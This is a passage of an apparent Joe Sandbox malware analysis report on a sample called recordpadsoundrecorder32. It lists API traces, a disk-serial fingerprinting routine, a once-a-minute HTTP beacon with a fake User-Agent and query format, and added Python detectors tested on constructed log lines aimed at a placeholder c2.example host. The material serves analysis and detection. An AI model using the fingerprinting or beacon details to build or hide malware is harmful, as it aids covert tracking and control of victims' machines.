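The two routines above (one in the on-disk image at 00401A4F, one in the unpacked region at 0260F851) open \\.\PhysicalDrive0 with dwDesiredAccess = 0 and then call DeviceIoControl with control code 0x2D1400, a 12-byte input buffer and a 0x400-byte output buffer. 0x2D1400 decodes to IOCTL_STORAGE_QUERY_PROPERTY (device type FILE_DEVICE_MASS_STORAGE, function 0x500, METHOD_BUFFERED, FILE_ANY_ACCESS), and 12 bytes is sizeof(STORAGE_PROPERTY_QUERY), so the call shape is the standard way to read the disk descriptor (vendor, product, serial number) from a standard user account: the zero-access open and the FILE_ANY_ACCESS control code need no administrative rights. Disk serials read this way are commonly used as a stable host fingerprint. The Python below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses the report's own "APIs" lines, decodes the control code and flags the open-raw-drive-then-query pair. API_LINES is copied verbatim from the 0260F851 entry; the decoder tables and the pairing rule are the example's own.

```python
import re

# Joe Sandbox "APIs" lines for the \\.\PhysicalDrive0 routine, copied from the
# report entry above. Parser and decoder are an added example, not report code.
API_LINES = [
    r"• CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 0260F870",
    r"• DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 0260F8AE",
    r"• GetLastError.KERNEL32 ref: 0260F90F",
    r"• FindCloseChangeNotification.KERNELBASE(?), ref: 0260F946",
]

# "• Api.MODULE(arg,arg,...), ref: ADDR"  or  "• Api.MODULE ref: ADDR"
_LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

def parse_api_line(line):
    """Return (api, module, args, ref); args are int, None ('?') or str."""
    m = _LINE_RE.match(line)
    if not m:
        raise ValueError("not an API line: %r" % line)
    args = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            if tok == "?":
                args.append(None)            # value not recovered by the sandbox
            elif re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
                args.append(int(tok, 16))    # 32-bit immediate or pointer
            else:
                args.append(tok)             # resolved string argument
    return m.group("api"), m.group("module"), args, int(m.group("ref"), 16)

# CTL_CODE(DeviceType, Function, Method, Access) =
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
ACCESS_NAMES = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
                2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS"}
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
KNOWN_IOCTLS = {0x2D1400: "IOCTL_STORAGE_QUERY_PROPERTY"}
FILE_DEVICE_MASS_STORAGE = 0x2D
SIZEOF_STORAGE_PROPERTY_QUERY = 12   # PropertyId, QueryType, AdditionalParameters[1] + padding

def decode_ctl_code(code):
    """Split a Windows CTL_CODE value into its four fields and name it if known."""
    return {
        "device_type": code >> 16,
        "access": ACCESS_NAMES[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHOD_NAMES[code & 0x3],
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }

def find_disk_fingerprinting(lines):
    """Flag a CreateFile on \\.\PhysicalDriveN followed by IOCTL_STORAGE_QUERY_PROPERTY."""
    findings, opened_raw_disk = [], False
    for api, _module, args, ref in (parse_api_line(l) for l in lines):
        if (api.startswith("CreateFile") and args and isinstance(args[0], str)
                and args[0].lower().startswith(r"\\.\physicaldrive")):
            opened_raw_disk = True
        elif (api == "DeviceIoControl" and opened_raw_disk
                and len(args) >= 6 and isinstance(args[1], int)):
            info = decode_ctl_code(args[1])
            if info["name"] == "IOCTL_STORAGE_QUERY_PROPERTY":
                findings.append({
                    "ref": ref,
                    "ioctl": info,
                    # nInBufferSize == sizeof(STORAGE_PROPERTY_QUERY) is the tell-tale shape
                    "in_size_matches_query_struct": args[3] == SIZEOF_STORAGE_PROPERTY_QUERY,
                    "out_size": args[5],
                })
    return findings

if __name__ == "__main__":
    for f in find_disk_fingerprinting(API_LINES):
        print("%08X %s in=%s out=%#x" % (f["ref"], f["ioctl"]["name"],
                                        f["in_size_matches_query_struct"], f["out_size"]))
```

The same decoder applies to any DeviceIoControl line in the report; the pairing rule deliberately keys on the raw-drive open rather than on the control code alone, because IOCTL_STORAGE_QUERY_PROPERTY is also issued by legitimate software against volume handles.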

                                                                                      Control-flow Graph: function at 02606443; the basic-block list shows RtlInitializeCriticalSection, GetModuleHandleA/GetProcAddress, GetTickCount, GetVersionExA, GetProcessHeap/RtlAllocateHeap, QueryPerformanceCounter, Sleep, then a loop around InternetOpenA, InternetSetOptionA (x3), InternetOpenUrlA, InternetReadFile and InternetCloseHandle, with further RtlEnterCriticalSection/RtlLeaveCriticalSection pairs and a Sleep in the loop; the rendered graph and its executed/not-executed legend are not reproduced here (the WinINet calls appear only in the graph, not in the truncated API list below)
                                                                                      APIs
                                                                                      • RtlInitializeCriticalSection.NTDLL(026371D8), ref: 026064B6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 026064CD
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064D6
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 026064E5
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 026064E8
                                                                                      • GetTickCount.KERNEL32 ref: 026064F4
                                                                                      • GetVersionExA.KERNEL32(02637030), ref: 02606521
                                                                                      • _memset.LIBCMT ref: 02606540
                                                                                      • _malloc.LIBCMT ref: 0260654D
                                                                                      • _malloc.LIBCMT ref: 0260655D
                                                                                      • _malloc.LIBCMT ref: 02606568
                                                                                      • _malloc.LIBCMT ref: 02606573
                                                                                      • _malloc.LIBCMT ref: 0260657E
                                                                                      • _malloc.LIBCMT ref: 02606589
                                                                                      • _malloc.LIBCMT ref: 02606594
                                                                                      • _malloc.LIBCMT ref: 026065A3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000004), ref: 026065BA
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065C3
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065D2
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065D5
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000400), ref: 026065E0
                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 026065E3
                                                                                      • _memset.LIBCMT ref: 026065F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc_memset$CountCriticalInitializeSectionTickVersion
                                                                                      • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
                                                                                      • API String ID: 3095297975-2678694477
                                                                                      • Opcode ID: 08ddbbb69802ae71d61b5e4d421425eba9532c9813c374077112ef593a3578fe
                                                                                      • Instruction ID: d6b4326f067e15b6fcadb7f88ec81dea4af99c84ff2141c737d6a62cce1711ff
                                                                                      • Opcode Fuzzy Hash: 08ddbbb69802ae71d61b5e4d421425eba9532c9813c374077112ef593a3578fe
                                                                                      • Instruction Fuzzy Hash: 728138B1D883509FE3216F309C44B5FBBE9AF85310F15482EF98997281DBB45849CF9A
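The strings attached to this routine define the beacon: a fixed User-Agent "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)" (no Windows NT 9.0 was ever released, so the string is a usable indicator on its own) and a printf format cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d carrying an 8-hex-digit client id, a connection flag, a port and a hex port range, and an OS version as major.minor.build, which is consistent with the GetVersionExA call in the same routine. The Sleep(0000EA60) at 02606704 is 60000 ms, so the loop polls about once a minute. The Python below is an added example, not code from the report or from the sample: it turns the recovered format string into a validating regex, decodes a beacon query string, and scans a few constructed proxy log lines (the c2.example host, the log layout and the client addresses are placeholders, not indicators taken from this analysis).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Strings recovered from the dump (see the String ID entry above).
BEACON_FMT = ("cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x"
              "&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d")
BEACON_UA = "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)"
BEACON_INTERVAL_MS = 0xEA60   # Sleep() argument at 02606704 = 60000 ms

# Constructed proxy log lines: client, method, URL, User-Agent (tab-separated).
# c2.example is a placeholder host, not an indicator from this report.
LOG_LINES = [
    "10.0.0.5\tGET\thttp://c2.example/?cid=0000abcd&connected=1&sport=1080"
    "&high_port=ffff&low_port=400&stream=0&os=10.0.19045&dgt=0&dti=0"
    "\tMozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "10.0.0.7\tGET\thttps://www.example.com/index.html?id=42"
    "\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/125.0",
    "10.0.0.9\tGET\thttp://c2.example/?cid=deadbeef&connected=0&sport=0"
    "&high_port=0&low_port=0&stream=1&os=6.1.7601&dgt=1&dti=2"
    "\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/125.0",
]

# %[0width][.precision](d|x), the only conversions the recovered format uses
_SPEC_RE = re.compile(r"%(?P<width>0?\d+)?(?:\.(?P<prec>\d+))?(?P<conv>[dx])")

def format_to_regex(fmt):
    """Translate a printf-style format into an anchored regex accepting its output."""
    parts, pos = [], 0
    for m in _SPEC_RE.finditer(fmt):
        parts.append(re.escape(fmt[pos:m.start()]))
        if m.group("conv") == "x":
            prec = m.group("prec")          # %.8x pads to at least 8 hex digits
            parts.append(r"[0-9a-fA-F]{%d,}" % int(prec) if prec else r"[0-9a-fA-F]+")
        else:
            width = m.group("width")        # %04d pads to at least 4 digits
            parts.append(r"-?\d{%d,}" % int(width) if width else r"-?\d+")
        pos = m.end()
    parts.append(re.escape(fmt[pos:]))
    return re.compile("^" + "".join(parts) + "$")

BEACON_RE = format_to_regex(BEACON_FMT)

def parse_beacon(query):
    """Return the decoded beacon fields if `query` matches BEACON_FMT, else None."""
    if not BEACON_RE.match(query):
        return None
    qs = {k: v[0] for k, v in parse_qs(query).items()}
    return {
        "cid": int(qs["cid"], 16),
        "connected": int(qs["connected"]),
        "sport": int(qs["sport"]),
        "high_port": int(qs["high_port"], 16),
        "low_port": int(qs["low_port"], 16),
        "stream": int(qs["stream"]),
        "os": tuple(int(x) for x in qs["os"].split(".")),   # major, minor, build
        "dgt": int(qs["dgt"]),
        "dti": int(qs["dti"]),
    }

def scan(lines):
    """Return [(line_index, [reasons])] for lines that look like this beacon."""
    findings = []
    for i, line in enumerate(lines):
        _client, _method, url, ua = line.split("\t")
        reasons = []
        if ua == BEACON_UA:
            reasons.append("hard-coded User-Agent (Windows NT 9.0 does not exist)")
        beacon = parse_beacon(urlsplit(url).query)
        if beacon is not None:
            reasons.append("query matches beacon format: cid=%08x os=%s"
                           % (beacon["cid"], ".".join(map(str, beacon["os"]))))
        if reasons:
            findings.append((i, reasons))
    return findings

if __name__ == "__main__":
    for idx, why in scan(LOG_LINES):
        print(idx, "; ".join(why))
```

Matching on the query shape catches the beacon even if a later build changes the User-Agent, and matching on the User-Agent catches it even if the format string changes; in a real proxy feed the two should be scored separately so a single shared field does not drive the alert.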

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02601D11
                                                                                      • GetLastError.KERNEL32 ref: 02601D23
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02601D59
                                                                                      • GetLastError.KERNEL32 ref: 02601D6B
                                                                                      • __beginthreadex.LIBCMT ref: 02601DB1
                                                                                      • GetLastError.KERNEL32 ref: 02601DC6
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02601DDD
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02601DEC
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02601E14
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 02601E1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseErrorLast$CreateEventHandle$ChangeFindH_prologNotificationObjectSingleWait__beginthreadex
                                                                                      • String ID: thread$thread.entry_event$thread.exit_event
                                                                                      • API String ID: 4246062733-3017686385
                                                                                      • Opcode ID: e4d7e4b6d8056d9a6386dea2d1e3b8d3074ab3d5632cf07c5287384d6cebcf04
                                                                                      • Instruction ID: 30b6eef9b52e64e42e9d66a0e2ab75ea53d4ee571e6dbf6918ac685d793a2810
                                                                                      • Opcode Fuzzy Hash: e4d7e4b6d8056d9a6386dea2d1e3b8d3074ab3d5632cf07c5287384d6cebcf04
                                                                                      • Instruction Fuzzy Hash: 65318871A007019FD711EF24C888A2FBBA5EF85710F1549ADF9498B2D1DB70A9898F92

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604D8B
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 02604DB7
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02604DC3
                                                                                        • Part of subcall function 02604BED: __EH_prolog.LIBCMT ref: 02604BF2
                                                                                        • Part of subcall function 02604BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02604CF2
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 02604E93
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02604E99
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 02604EA0
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 02604EA6
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026050A7
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026050AD
                                                                                      • RtlEnterCriticalSection.NTDLL(026371D8), ref: 026050B8
                                                                                      • RtlLeaveCriticalSection.NTDLL(026371D8), ref: 026050C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                      • String ID:
                                                                                      • API String ID: 2062355503-0
                                                                                      • Opcode ID: 15d773749502c66c78498a6d9966f0bba461b182dd1edc4af5347800ac7adc75
                                                                                      • Instruction ID: c5aa9d2d3ca969325db5df219b0251204793edede502d672a2f8ff122fb8d1a0
                                                                                      • Opcode Fuzzy Hash: 15d773749502c66c78498a6d9966f0bba461b182dd1edc4af5347800ac7adc75
                                                                                      • Instruction Fuzzy Hash: 0AB14B71D0025DDEDF29DFA0C880BEEBBB5AF04304F14409AE90976280DBB55A49DFA5

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 858 401f64-401f84 FindResourceA 859 401f86-401f9d GetLastError SizeofResource 858->859 860 401f9f-401fa1 858->860 859->860 861 401fa6-401fec LoadResource LockResource GlobalAlloc call 402940 * 2 859->861 862 402096-40209a 860->862 867 401fee-401ff9 861->867 867->867 868 401ffb-402003 GetTickCount 867->868 869 402032-402038 868->869 870 402005-402007 868->870 871 402053-402083 GlobalAlloc call 401c26 869->871 873 40203a-40204a 869->873 870->871 872 402009-40200f 870->872 878 402088-402093 871->878 872->871 875 402011-402023 872->875 876 40204c 873->876 877 40204e-402051 873->877 879 402025 875->879 880 402027-40202a 875->880 876->877 877->871 877->873 878->862 879->880 880->875 881 40202c-40202e 880->881 881->872 882 402030 881->882 882->871
                                                                                      APIs
                                                                                      • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                      • GetLastError.KERNEL32 ref: 00401F86
                                                                                      • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                      • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                      • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 00401FBF
                                                                                      • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                      • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402061
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                      • String ID:
                                                                                      • API String ID: 564119183-0
                                                                                      • Opcode ID: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction ID: 6227662f3afde43d5576465443d89a1ce2d87db52467ebd9ddb435d6f9af9923
                                                                                      • Opcode Fuzzy Hash: cf410bcafb83c3e7ab838bb09d8b52e2eecc876fdde86efd7a07cb304e42b138
                                                                                      • Instruction Fuzzy Hash: 68316E31A00255AFDB105FB49F8896F7F68EF45344F10807AFE86F7291DA748845C7A8

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 02602706
                                                                                      • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0260272B
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02625B03), ref: 02602738
                                                                                        • Part of subcall function 02601712: __EH_prolog.LIBCMT ref: 02601717
                                                                                      • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02602778
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 026027D9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                      • String ID: timer
                                                                                      • API String ID: 4293676635-1792073242
                                                                                      • Opcode ID: aee2c1a295e32129151a29020bf255a479dcae1dde59bd4245c5e7bda9b2acd1
                                                                                      • Instruction ID: bc98475952681bd60c8e6c4a9bae7eac95abc3d4b3015d343f51bffb7316534b
                                                                                      • Opcode Fuzzy Hash: aee2c1a295e32129151a29020bf255a479dcae1dde59bd4245c5e7bda9b2acd1
                                                                                      • Instruction Fuzzy Hash: 7B318BB1804B05AFD315DF25C988B1BBBE8FF48724F004A2EF95582680D770E858CF95

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 934 2602b95-2602baf 935 2602bb1-2602bb9 call 2610ac0 934->935 936 2602bc7-2602bcb 934->936 943 2602bbf-2602bc2 935->943 938 2602bcd-2602bd0 936->938 939 2602bdf 936->939 938->939 941 2602bd2-2602bdd call 2610ac0 938->941 942 2602be2-2602c11 WSASetLastError WSARecv call 260a4b7 939->942 941->943 948 2602c16-2602c1d 942->948 946 2602d30 943->946 949 2602d32-2602d38 946->949 950 2602c2c-2602c32 948->950 951 2602c1f-2602c2a call 2610ac0 948->951 952 2602c34-2602c39 call 2610ac0 950->952 953 2602c46-2602c48 950->953 962 2602c3f-2602c42 951->962 952->962 956 2602c4a-2602c4d 953->956 957 2602c4f-2602c60 call 2610ac0 953->957 960 2602c66-2602c69 956->960 957->949 957->960 964 2602c73-2602c76 960->964 965 2602c6b-2602c6d 960->965 962->953 964->946 967 2602c7c-2602c9a call 2610ac0 call 260166f 964->967 965->964 966 2602d22-2602d2d call 2601996 965->966 966->946 974 2602cbc-2602cfa WSASetLastError select call 260a4b7 967->974 975 2602c9c-2602cba call 2610ac0 call 260166f 967->975 981 2602d08 974->981 982 2602cfc-2602d06 call 2610ac0 974->982 975->946 975->974 985 2602d15-2602d17 981->985 986 2602d0a-2602d12 call 2610ac0 981->986 987 2602d19-2602d1d 982->987 985->946 985->987 986->985 987->942
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602BE4
                                                                                      • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02602C07
                                                                                        • Part of subcall function 0260A4B7: WSAGetLastError.WS2_32(00000000,?,?,02602A51), ref: 0260A4C5
                                                                                      • WSASetLastError.WS2_32 ref: 02602CD3
                                                                                      • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02602CE7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$Recvselect
                                                                                      • String ID: 3'
                                                                                      • API String ID: 886190287-280543908
                                                                                      • Opcode ID: e6b4a9b0fe7552d16beb85d41858104053d558857b9381ca6bbba373884d6449
                                                                                      • Instruction ID: 313b0c0f2af41c3e87e66ccb6bb0c0424a2311d93b67b623dddf6b054d71842e
                                                                                      • Opcode Fuzzy Hash: e6b4a9b0fe7552d16beb85d41858104053d558857b9381ca6bbba373884d6449
                                                                                      • Instruction Fuzzy Hash: EC418EB19053019FDB289F74C99876BBBE9AF85354F14091EEC99832C0EB74D884DB92

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 00402F16
                                                                                        • Part of subcall function 00404034: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00404034: HeapDestroy.KERNEL32 ref: 00404084
                                                                                      • GetCommandLineA.KERNEL32 ref: 00402F64
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402F8F
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FB2
                                                                                        • Part of subcall function 0040300B: ExitProcess.KERNEL32 ref: 00403028
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                      • String ID: Y
                                                                                      • API String ID: 2057626494-4136946213
                                                                                      • Opcode ID: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction ID: 31bd938ea51fadde60a3d0ec437c396cd65a6e637b97124abe794e54387ab133
                                                                                      • Opcode Fuzzy Hash: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction Fuzzy Hash: 19216DB1800615AAD714AFA6DE49A6E7FB8EB44719F10413FF505BB2D1DB385500CA58

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 1070 402845-40d446 call 402db0 GetCommandLineW CommandLineToArgvW GetLocalTime call 401f27 1079 40d8a7 1070->1079 1080 40d44c-40dba7 1070->1080 1082 40d8aa 1079->1082 1083 40dbaa 1080->1083 1082->1082 1083->1083
                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32(?), ref: 004028F2
                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 004028F9
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvLocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 3768950922-2768313731
                                                                                      • Opcode ID: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction ID: f8a697a6ba56cfa0421d3161c88fb5920d4a750ed1aa0ba2803a0c5cf8bd7934
                                                                                      • Opcode Fuzzy Hash: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction Fuzzy Hash: 59E06D75C08202EEC7007BE0AF098AC77B4AA08301320817FE556B51D0CB7C548AAB2F

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 1084 26029ee-2602a06 1085 2602ab3-2602abb call 2610ac0 1084->1085 1086 2602a0c-2602a10 1084->1086 1093 2602abe-2602ac6 1085->1093 1088 2602a12-2602a15 1086->1088 1089 2602a39-2602a4c WSASetLastError closesocket call 260a4b7 1086->1089 1088->1089 1092 2602a17-2602a36 call 2610ac0 call 2602f50 1088->1092 1094 2602a51-2602a55 1089->1094 1092->1089 1094->1085 1096 2602a57-2602a5f call 2610ac0 1094->1096 1102 2602a61-2602a67 1096->1102 1103 2602a69-2602a71 call 2610ac0 1096->1103 1102->1103 1104 2602a7b-2602aad ioctlsocket WSASetLastError closesocket call 260a4b7 1102->1104 1108 2602a73-2602a79 1103->1108 1109 2602aaf-2602ab1 1103->1109 1104->1109 1108->1104 1108->1109 1109->1085 1109->1093
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000), ref: 02602A3B
                                                                                      • closesocket.WS2_32 ref: 02602A42
                                                                                      • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02602A89
                                                                                      • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02602A97
                                                                                      • closesocket.WS2_32 ref: 02602A9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                      • String ID:
                                                                                      • API String ID: 1561005644-0
                                                                                      • Opcode ID: 30ce3cf9f49c41bdde748ea7d1bac5e98df59f2c6a38d4a817cd0ffb25e0b93a
                                                                                      • Instruction ID: d21e733f1f325fa5d734ee757be219139f772e5b5da3bb86b50ababd94f4b21e
                                                                                      • Opcode Fuzzy Hash: 30ce3cf9f49c41bdde748ea7d1bac5e98df59f2c6a38d4a817cd0ffb25e0b93a
                                                                                      • Instruction Fuzzy Hash: 3D212471A00205ABEB299BB88988B6FB2E9AF44315F19496DEC05C32C1EF70D9808B50
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02601BAC
                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02601BBC
                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02601BEA
                                                                                      • RtlEnterCriticalSection.NTDLL ref: 02601C13
                                                                                      • RtlLeaveCriticalSection.NTDLL ref: 02601C56
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 1633115879-0
                                                                                      • Opcode ID: 5a43a15ff5a5ca394776d0fdc9f3345bd36dc59db38bc987700a322caba6ecc6
                                                                                      • Instruction ID: b208737111b6af8f368d68565e32be3d93763a0fe0496fbab0e7ce5e01f74e5c
                                                                                      • Opcode Fuzzy Hash: 5a43a15ff5a5ca394776d0fdc9f3345bd36dc59db38bc987700a322caba6ecc6
                                                                                      • Instruction Fuzzy Hash: 9A21ABB5A00644DFCB28CF68C584BABBBB5FF49314F11858AEC0997341D774E949DBA0
